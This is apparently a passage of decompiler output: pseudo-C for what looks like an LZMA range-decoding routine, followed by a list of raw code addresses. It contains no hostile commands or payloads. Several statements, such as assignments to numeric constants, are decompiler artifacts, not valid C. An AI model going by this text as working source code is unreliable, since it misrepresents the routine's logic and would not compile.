                                  							}
                                  							__eflags =  *(__ebp - 0x34) - __edx;
                                  							if( *(__ebp - 0x34) == __edx) {
                                  								__ebx = 0;
                                  								__ebx = 1;
                                  								goto L61;
                                  							} else {
                                  								__eax =  *(__ebp - 0x14);
                                  								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  								__eflags = __eax -  *(__ebp - 0x74);
                                  								if(__eax >=  *(__ebp - 0x74)) {
                                  									__eax = __eax +  *(__ebp - 0x74);
                                  									__eflags = __eax;
                                  								}
                                  								__ecx =  *(__ebp - 8);
                                  								__ebx = 0;
                                  								__ebx = 1;
                                  								__al =  *((intOrPtr*)(__eax + __ecx));
                                  								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                  								goto L41;
                                  							}
                                  						case 7:
                                  							__eflags =  *(__ebp - 0x40) - 1;
                                  							if( *(__ebp - 0x40) != 1) {
                                  								__eax =  *(__ebp - 0x24);
                                  								 *(__ebp - 0x80) = 0x16;
                                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                  								__eax =  *(__ebp - 0x28);
                                  								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                  								__eax =  *(__ebp - 0x2c);
                                  								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                  								__eax = 0;
                                  								__eflags =  *(__ebp - 0x38) - 7;
                                  								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  								__al = __al & 0x000000fd;
                                  								__eax = (__eflags >= 0) - 1 + 0xa;
                                  								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                  								__eax =  *(__ebp - 4);
                                  								__eax =  *(__ebp - 4) + 0x664;
                                  								__eflags = __eax;
                                  								 *(__ebp - 0x58) = __eax;
                                  								goto L69;
                                  							}
                                  							__eax =  *(__ebp - 4);
                                  							__ecx =  *(__ebp - 0x38);
                                  							 *(__ebp - 0x84) = 8;
                                  							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                  							goto L132;
                                  						case 8:
                                  							__eflags =  *(__ebp - 0x40);
                                  							if( *(__ebp - 0x40) != 0) {
                                  								__eax =  *(__ebp - 4);
                                  								__ecx =  *(__ebp - 0x38);
                                  								 *(__ebp - 0x84) = 0xa;
                                  								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                  							} else {
                                  								__eax =  *(__ebp - 0x38);
                                  								__ecx =  *(__ebp - 4);
                                  								__eax =  *(__ebp - 0x38) + 0xf;
                                  								 *(__ebp - 0x84) = 9;
                                  								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                  								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                  							}
                                  							goto L132;
                                  						case 9:
                                  							goto L0;
                                  						case 0xa:
                                  							__eflags =  *(__ebp - 0x40);
                                  							if( *(__ebp - 0x40) != 0) {
                                  								__eax =  *(__ebp - 4);
                                  								__ecx =  *(__ebp - 0x38);
                                  								 *(__ebp - 0x84) = 0xb;
                                  								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                  								goto L132;
                                  							}
                                  							__eax =  *(__ebp - 0x28);
                                  							goto L88;
                                  						case 0xb:
                                  							__eflags =  *(__ebp - 0x40);
                                  							if( *(__ebp - 0x40) != 0) {
                                  								__ecx =  *(__ebp - 0x24);
                                  								__eax =  *(__ebp - 0x20);
                                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                  							} else {
                                  								__eax =  *(__ebp - 0x24);
                                  							}
                                  							__ecx =  *(__ebp - 0x28);
                                  							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                  							L88:
                                  							__ecx =  *(__ebp - 0x2c);
                                  							 *(__ebp - 0x2c) = __eax;
                                  							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                  							goto L89;
                                  						case 0xc:
                                  							L99:
                                  							__eflags =  *(__ebp - 0x6c);
                                  							if( *(__ebp - 0x6c) == 0) {
                                  								 *(__ebp - 0x88) = 0xc;
                                  								goto L170;
                                  							}
                                  							__ecx =  *(__ebp - 0x70);
                                  							__eax =  *(__ebp - 0xc);
                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							_t334 = __ebp - 0x70;
                                  							 *_t334 =  *(__ebp - 0x70) + 1;
                                  							__eflags =  *_t334;
                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							__eax =  *(__ebp - 0x2c);
                                  							goto L101;
                                  						case 0xd:
                                  							L37:
                                  							__eflags =  *(__ebp - 0x6c);
                                  							if( *(__ebp - 0x6c) == 0) {
                                  								 *(__ebp - 0x88) = 0xd;
                                  								goto L170;
                                  							}
                                  							__ecx =  *(__ebp - 0x70);
                                  							__eax =  *(__ebp - 0xc);
                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							_t122 = __ebp - 0x70;
                                  							 *_t122 =  *(__ebp - 0x70) + 1;
                                  							__eflags =  *_t122;
                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							L39:
                                  							__eax =  *(__ebp - 0x40);
                                  							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                  							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                  								goto L48;
                                  							}
                                  							__eflags = __ebx - 0x100;
                                  							if(__ebx >= 0x100) {
                                  								goto L54;
                                  							}
                                  							L41:
                                  							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                  							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                  							__ecx =  *(__ebp - 0x58);
                                  							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                  							 *(__ebp - 0x48) = __eax;
                                  							__eax = __eax + 1;
                                  							__eax = __eax << 8;
                                  							__eax = __eax + __ebx;
                                  							__esi =  *(__ebp - 0x58) + __eax * 2;
                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  							__ax =  *__esi;
                                  							 *(__ebp - 0x54) = __esi;
                                  							__edx = __ax & 0x0000ffff;
                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                  							__eflags =  *(__ebp - 0xc) - __ecx;
                                  							if( *(__ebp - 0xc) >= __ecx) {
                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  								__cx = __ax;
                                  								 *(__ebp - 0x40) = 1;
                                  								__cx = __ax >> 5;
                                  								__eflags = __eax;
                                  								__ebx = __ebx + __ebx + 1;
                                  								 *__esi = __ax;
                                  							} else {
                                  								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                  								 *(__ebp - 0x10) = __ecx;
                                  								0x800 = 0x800 - __edx;
                                  								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                  								__ebx = __ebx + __ebx;
                                  								 *__esi = __cx;
                                  							}
                                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  							 *(__ebp - 0x44) = __ebx;
                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                  								goto L39;
                                  							} else {
                                  								goto L37;
                                  							}
                                  						case 0xe:
                                  							L46:
                                  							__eflags =  *(__ebp - 0x6c);
                                  							if( *(__ebp - 0x6c) == 0) {
                                  								 *(__ebp - 0x88) = 0xe;
                                  								goto L170;
                                  							}
                                  							__ecx =  *(__ebp - 0x70);
                                  							__eax =  *(__ebp - 0xc);
                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							_t156 = __ebp - 0x70;
                                  							 *_t156 =  *(__ebp - 0x70) + 1;
                                  							__eflags =  *_t156;
                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							while(1) {
                                  								L48:
                                  								__eflags = __ebx - 0x100;
                                  								if(__ebx >= 0x100) {
                                  									break;
                                  								}
                                  								__eax =  *(__ebp - 0x58);
                                  								__edx = __ebx + __ebx;
                                  								__ecx =  *(__ebp - 0x10);
                                  								__esi = __edx + __eax;
                                  								__ecx =  *(__ebp - 0x10) >> 0xb;
                                  								__ax =  *__esi;
                                  								 *(__ebp - 0x54) = __esi;
                                  								__edi = __ax & 0x0000ffff;
                                  								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  								__eflags =  *(__ebp - 0xc) - __ecx;
                                  								if( *(__ebp - 0xc) >= __ecx) {
                                  									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  									__cx = __ax;
                                  									_t170 = __edx + 1; // 0x1
                                  									__ebx = _t170;
                                  									__cx = __ax >> 5;
                                  									__eflags = __eax;
                                  									 *__esi = __ax;
                                  								} else {
                                  									 *(__ebp - 0x10) = __ecx;
                                  									0x800 = 0x800 - __edi;
                                  									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  									__ebx = __ebx + __ebx;
                                  									 *__esi = __cx;
                                  								}
                                  								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  								 *(__ebp - 0x44) = __ebx;
                                  								if( *(__ebp - 0x10) >= 0x1000000) {
                                  									continue;
                                  								} else {
                                  									goto L46;
                                  								}
                                  							}
                                  							L54:
                                  							_t173 = __ebp - 0x34;
                                  							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                  							__eflags =  *_t173;
                                  							goto L55;
                                  						case 0xf:
                                  							L58:
                                  							__eflags =  *(__ebp - 0x6c);
                                  							if( *(__ebp - 0x6c) == 0) {
                                  								 *(__ebp - 0x88) = 0xf;
                                  								goto L170;
                                  							}
                                  							__ecx =  *(__ebp - 0x70);
                                  							__eax =  *(__ebp - 0xc);
                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							_t203 = __ebp - 0x70;
                                  							 *_t203 =  *(__ebp - 0x70) + 1;
                                  							__eflags =  *_t203;
                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							L60:
                                  							__eflags = __ebx - 0x100;
                                  							if(__ebx >= 0x100) {
                                  								L55:
                                  								__al =  *(__ebp - 0x44);
                                  								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                  								goto L56;
                                  							}
                                  							L61:
                                  							__eax =  *(__ebp - 0x58);
                                  							__edx = __ebx + __ebx;
                                  							__ecx =  *(__ebp - 0x10);
                                  							__esi = __edx + __eax;
                                  							__ecx =  *(__ebp - 0x10) >> 0xb;
                                  							__ax =  *__esi;
                                  							 *(__ebp - 0x54) = __esi;
                                  							__edi = __ax & 0x0000ffff;
                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  							__eflags =  *(__ebp - 0xc) - __ecx;
                                  							if( *(__ebp - 0xc) >= __ecx) {
                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  								__cx = __ax;
                                  								_t217 = __edx + 1; // 0x1
                                  								__ebx = _t217;
                                  								__cx = __ax >> 5;
                                  								__eflags = __eax;
                                  								 *__esi = __ax;
                                  							} else {
                                  								 *(__ebp - 0x10) = __ecx;
                                  								0x800 = 0x800 - __edi;
                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  								__ebx = __ebx + __ebx;
                                  								 *__esi = __cx;
                                  							}
                                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  							 *(__ebp - 0x44) = __ebx;
                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                  								goto L60;
                                  							} else {
                                  								goto L58;
                                  							}
                                  						case 0x10:
                                  							L109:
                                  							__eflags =  *(__ebp - 0x6c);
                                  							if( *(__ebp - 0x6c) == 0) {
                                  								 *(__ebp - 0x88) = 0x10;
                                  								goto L170;
                                  							}
                                  							__ecx =  *(__ebp - 0x70);
                                  							__eax =  *(__ebp - 0xc);
                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							_t365 = __ebp - 0x70;
                                  							 *_t365 =  *(__ebp - 0x70) + 1;
                                  							__eflags =  *_t365;
                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							goto L111;
                                  						case 0x11:
                                  							goto L69;
                                  						case 0x12:
                                  							__eflags =  *(__ebp - 0x40);
                                  							if( *(__ebp - 0x40) != 0) {
                                  								__eax =  *(__ebp - 0x58);
                                  								 *(__ebp - 0x84) = 0x13;
                                  								__esi =  *(__ebp - 0x58) + 2;
                                  								goto L132;
                                  							}
                                  							__eax =  *(__ebp - 0x4c);
                                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                  							__ecx =  *(__ebp - 0x58);
                                  							__eax =  *(__ebp - 0x4c) << 4;
                                  							__eflags = __eax;
                                  							__eax =  *(__ebp - 0x58) + __eax + 4;
                                  							goto L130;
                                  						case 0x13:
                                  							__eflags =  *(__ebp - 0x40);
                                  							if( *(__ebp - 0x40) != 0) {
                                  								_t469 = __ebp - 0x58;
                                  								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                  								__eflags =  *_t469;
                                  								 *(__ebp - 0x30) = 0x10;
                                  								 *(__ebp - 0x40) = 8;
                                  								L144:
                                  								 *(__ebp - 0x7c) = 0x14;
                                  								goto L145;
                                  							}
                                  							__eax =  *(__ebp - 0x4c);
                                  							__ecx =  *(__ebp - 0x58);
                                  							__eax =  *(__ebp - 0x4c) << 4;
                                  							 *(__ebp - 0x30) = 8;
                                  							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                  							L130:
                                  							 *(__ebp - 0x58) = __eax;
                                  							 *(__ebp - 0x40) = 3;
                                  							goto L144;
                                  						case 0x14:
                                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                  							__eax =  *(__ebp - 0x80);
                                  							goto L140;
                                  						case 0x15:
                                  							__eax = 0;
                                  							__eflags =  *(__ebp - 0x38) - 7;
                                  							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  							__al = __al & 0x000000fd;
                                  							__eax = (__eflags >= 0) - 1 + 0xb;
                                  							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                  							goto L120;
                                  						case 0x16:
                                  							__eax =  *(__ebp - 0x30);
                                  							__eflags = __eax - 4;
                                  							if(__eax >= 4) {
                                  								_push(3);
                                  								_pop(__eax);
                                  							}
                                  							__ecx =  *(__ebp - 4);
                                  							 *(__ebp - 0x40) = 6;
                                  							__eax = __eax << 7;
                                  							 *(__ebp - 0x7c) = 0x19;
                                  							 *(__ebp - 0x58) = __eax;
                                  							goto L145;
                                  						case 0x17:
                                  							L145:
                                  							__eax =  *(__ebp - 0x40);
                                  							 *(__ebp - 0x50) = 1;
                                  							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                  							goto L149;
                                  						case 0x18:
                                  							L146:
                                  							__eflags =  *(__ebp - 0x6c);
                                  							if( *(__ebp - 0x6c) == 0) {
                                  								 *(__ebp - 0x88) = 0x18;
                                  								goto L170;
                                  							}
                                  							__ecx =  *(__ebp - 0x70);
                                  							__eax =  *(__ebp - 0xc);
                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							_t484 = __ebp - 0x70;
                                  							 *_t484 =  *(__ebp - 0x70) + 1;
                                  							__eflags =  *_t484;
                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							L148:
                                  							_t487 = __ebp - 0x48;
                                  							 *_t487 =  *(__ebp - 0x48) - 1;
                                  							__eflags =  *_t487;
                                  							L149:
                                  							__eflags =  *(__ebp - 0x48);
                                  							if( *(__ebp - 0x48) <= 0) {
                                  								__ecx =  *(__ebp - 0x40);
                                  								__ebx =  *(__ebp - 0x50);
                                  								0 = 1;
                                  								__eax = 1 << __cl;
                                  								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                  								__eax =  *(__ebp - 0x7c);
                                  								 *(__ebp - 0x44) = __ebx;
                                  								goto L140;
                                  							}
                                  							__eax =  *(__ebp - 0x50);
                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                  							__eax =  *(__ebp - 0x58);
                                  							__esi = __edx + __eax;
                                  							 *(__ebp - 0x54) = __esi;
                                  							__ax =  *__esi;
                                  							__edi = __ax & 0x0000ffff;
                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  							__eflags =  *(__ebp - 0xc) - __ecx;
                                  							if( *(__ebp - 0xc) >= __ecx) {
                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  								__cx = __ax;
                                  								__cx = __ax >> 5;
                                  								__eax = __eax - __ecx;
                                  								__edx = __edx + 1;
                                  								__eflags = __edx;
                                  								 *__esi = __ax;
                                  								 *(__ebp - 0x50) = __edx;
                                  							} else {
                                  								 *(__ebp - 0x10) = __ecx;
                                  								0x800 = 0x800 - __edi;
                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                  								 *__esi = __cx;
                                  							}
                                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                  								goto L148;
                                  							} else {
                                  								goto L146;
                                  							}
                                  						case 0x19:
                                  							__eflags = __ebx - 4;
                                  							if(__ebx < 4) {
                                  								 *(__ebp - 0x2c) = __ebx;
                                  								L119:
                                  								_t393 = __ebp - 0x2c;
                                  								 *_t393 =  *(__ebp - 0x2c) + 1;
                                  								__eflags =  *_t393;
                                  								L120:
                                  								__eax =  *(__ebp - 0x2c);
                                  								__eflags = __eax;
                                  								if(__eax == 0) {
                                  									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                  									goto L170;
                                  								}
                                  								__eflags = __eax -  *(__ebp - 0x60);
                                  								if(__eax >  *(__ebp - 0x60)) {
                                  									goto L171;
                                  								}
                                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                  								__eax =  *(__ebp - 0x30);
                                  								_t400 = __ebp - 0x60;
                                  								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                  								__eflags =  *_t400;
                                  								goto L123;
                                  							}
                                  							__ecx = __ebx;
                                  							__eax = __ebx;
                                  							__ecx = __ebx >> 1;
                                  							__eax = __ebx & 0x00000001;
                                  							__ecx = (__ebx >> 1) - 1;
                                  							__al = __al | 0x00000002;
                                  							__eax = (__ebx & 0x00000001) << __cl;
                                  							__eflags = __ebx - 0xe;
                                  							 *(__ebp - 0x2c) = __eax;
                                  							if(__ebx >= 0xe) {
                                  								__ebx = 0;
                                  								 *(__ebp - 0x48) = __ecx;
                                  								L102:
                                  								__eflags =  *(__ebp - 0x48);
                                  								if( *(__ebp - 0x48) <= 0) {
                                  									__eax = __eax + __ebx;
                                  									 *(__ebp - 0x40) = 4;
                                  									 *(__ebp - 0x2c) = __eax;
                                  									__eax =  *(__ebp - 4);
                                  									__eax =  *(__ebp - 4) + 0x644;
                                  									__eflags = __eax;
                                  									L108:
                                  									__ebx = 0;
                                  									 *(__ebp - 0x58) = __eax;
                                  									 *(__ebp - 0x50) = 1;
                                  									 *(__ebp - 0x44) = 0;
                                  									 *(__ebp - 0x48) = 0;
                                  									L112:
                                  									__eax =  *(__ebp - 0x40);
                                  									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                  									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                  										_t391 = __ebp - 0x2c;
                                  										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                  										__eflags =  *_t391;
                                  										goto L119;
                                  									}
                                  									__eax =  *(__ebp - 0x50);
                                  									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                  									__eax =  *(__ebp - 0x58);
                                  									__esi = __edi + __eax;
                                  									 *(__ebp - 0x54) = __esi;
                                  									__ax =  *__esi;
                                  									__ecx = __ax & 0x0000ffff;
                                  									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                  									__eflags =  *(__ebp - 0xc) - __edx;
                                  									if( *(__ebp - 0xc) >= __edx) {
                                  										__ecx = 0;
                                  										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                  										__ecx = 1;
                                  										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                  										__ebx = 1;
                                  										__ecx =  *(__ebp - 0x48);
                                  										__ebx = 1 << __cl;
                                  										__ecx = 1 << __cl;
                                  										__ebx =  *(__ebp - 0x44);
                                  										__ebx =  *(__ebp - 0x44) | __ecx;
                                  										__cx = __ax;
                                  										__cx = __ax >> 5;
                                  										__eax = __eax - __ecx;
                                  										__edi = __edi + 1;
                                  										__eflags = __edi;
                                  										 *(__ebp - 0x44) = __ebx;
                                  										 *__esi = __ax;
                                  										 *(__ebp - 0x50) = __edi;
                                  									} else {
                                  										 *(__ebp - 0x10) = __edx;
                                  										0x800 = 0x800 - __ecx;
                                  										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                  										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                  										 *__esi = __dx;
                                  									}
                                  									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  									if( *(__ebp - 0x10) >= 0x1000000) {
                                  										L111:
                                  										_t368 = __ebp - 0x48;
                                  										 *_t368 =  *(__ebp - 0x48) + 1;
                                  										__eflags =  *_t368;
                                  										goto L112;
                                  									} else {
                                  										goto L109;
                                  									}
                                  								}
                                  								__ecx =  *(__ebp - 0xc);
                                  								__ebx = __ebx + __ebx;
                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                  								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                  								 *(__ebp - 0x44) = __ebx;
                                  								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                  									__ecx =  *(__ebp - 0x10);
                                  									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                  									__ebx = __ebx | 0x00000001;
                                  									__eflags = __ebx;
                                  									 *(__ebp - 0x44) = __ebx;
                                  								}
                                  								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  								if( *(__ebp - 0x10) >= 0x1000000) {
                                  									L101:
                                  									_t338 = __ebp - 0x48;
                                  									 *_t338 =  *(__ebp - 0x48) - 1;
                                  									__eflags =  *_t338;
                                  									goto L102;
                                  								} else {
                                  									goto L99;
                                  								}
                                  							}
                                  							__edx =  *(__ebp - 4);
                                  							__eax = __eax - __ebx;
                                  							 *(__ebp - 0x40) = __ecx;
                                  							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                  							goto L108;
                                  						case 0x1a:
                                  							L56:
                                  							__eflags =  *(__ebp - 0x64);
                                  							if( *(__ebp - 0x64) == 0) {
                                  								 *(__ebp - 0x88) = 0x1a;
                                  								goto L170;
                                  							}
                                  							__ecx =  *(__ebp - 0x68);
                                  							__al =  *(__ebp - 0x5c);
                                  							__edx =  *(__ebp - 8);
                                  							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                  							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                  							 *( *(__ebp - 0x68)) = __al;
                                  							__ecx =  *(__ebp - 0x14);
                                  							 *(__ecx +  *(__ebp - 8)) = __al;
                                  							__eax = __ecx + 1;
                                  							__edx = 0;
                                  							_t192 = __eax %  *(__ebp - 0x74);
                                  							__eax = __eax /  *(__ebp - 0x74);
                                  							__edx = _t192;
                                  							goto L79;
                                  						case 0x1b:
                                  							goto L75;
                                  						case 0x1c:
                                  							while(1) {
                                  								L123:
                                  								__eflags =  *(__ebp - 0x64);
                                  								if( *(__ebp - 0x64) == 0) {
                                  									break;
                                  								}
                                  								__eax =  *(__ebp - 0x14);
                                  								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  								__eflags = __eax -  *(__ebp - 0x74);
                                  								if(__eax >=  *(__ebp - 0x74)) {
                                  									__eax = __eax +  *(__ebp - 0x74);
                                  									__eflags = __eax;
                                  								}
                                  								__edx =  *(__ebp - 8);
                                  								__cl =  *(__eax + __edx);
                                  								__eax =  *(__ebp - 0x14);
                                  								 *(__ebp - 0x5c) = __cl;
                                  								 *(__eax + __edx) = __cl;
                                  								__eax = __eax + 1;
                                  								__edx = 0;
                                  								_t414 = __eax %  *(__ebp - 0x74);
                                  								__eax = __eax /  *(__ebp - 0x74);
                                  								__edx = _t414;
                                  								__eax =  *(__ebp - 0x68);
                                  								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                  								__eflags =  *(__ebp - 0x30);
                                  								 *( *(__ebp - 0x68)) = __cl;
                                  								 *(__ebp - 0x14) = _t414;
                                  								if( *(__ebp - 0x30) > 0) {
                                  									continue;
                                  								} else {
                                  									goto L80;
                                  								}
                                  							}
                                  							 *(__ebp - 0x88) = 0x1c;
                                  							goto L170;
                                  					}
                                  				}
                                  			}













                                  0x00407484
                                  0x0040748c
                                  0x00407493
                                  0x00407495
                                  0x00000000
                                  0x00407495
                                  0x00406f78
                                  0x00406f7b
                                  0x00406f81
                                  0x00406f83
                                  0x00406f83
                                  0x00406f86
                                  0x00406f89
                                  0x00406f8c
                                  0x00406f8f
                                  0x00406f92
                                  0x00406f95
                                  0x00406f96
                                  0x00406f98
                                  0x00406f98
                                  0x00406f98
                                  0x00406f9b
                                  0x00406f9e
                                  0x00406fa1
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa7
                                  0x00406fa9
                                  0x00406fa9
                                  0x00406fac
                                  0x00406fac
                                  0x00406fac
                                  0x00406a82
                                  0x00406a82
                                  0x00406a8b
                                  0x00000000
                                  0x00000000
                                  0x00406a91
                                  0x00000000
                                  0x00406a9c
                                  0x00000000
                                  0x00000000
                                  0x00406aa5
                                  0x00406aa8
                                  0x00406aab
                                  0x00406aaf
                                  0x00000000
                                  0x00000000
                                  0x00406ab5
                                  0x00406ab8
                                  0x00406aba
                                  0x00406abb
                                  0x00406abe
                                  0x00406ac0
                                  0x00406ac1
                                  0x00406ac3
                                  0x00406ac6
                                  0x00406acb
                                  0x00406ad0
                                  0x00406ad9
                                  0x00406aec
                                  0x00406aef
                                  0x00406afb
                                  0x00406b23
                                  0x00406b25
                                  0x00406b33
                                  0x00406b33
                                  0x00406b37
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406b27
                                  0x00406b27
                                  0x00406b2a
                                  0x00406b2b
                                  0x00406b2b
                                  0x00000000
                                  0x00406b27
                                  0x00406b01
                                  0x00406b06
                                  0x00406b06
                                  0x00406b0f
                                  0x00406b17
                                  0x00406b1a
                                  0x00000000
                                  0x00406b20
                                  0x00406b20
                                  0x00000000
                                  0x00406b20
                                  0x00000000
                                  0x00406b3d
                                  0x00406b3d
                                  0x00406b41
                                  0x004073ed
                                  0x00000000
                                  0x004073ed
                                  0x00406b4a
                                  0x00406b5a
                                  0x00406b5d
                                  0x00406b60
                                  0x00406b60
                                  0x00406b60
                                  0x00406b63
                                  0x00406b67
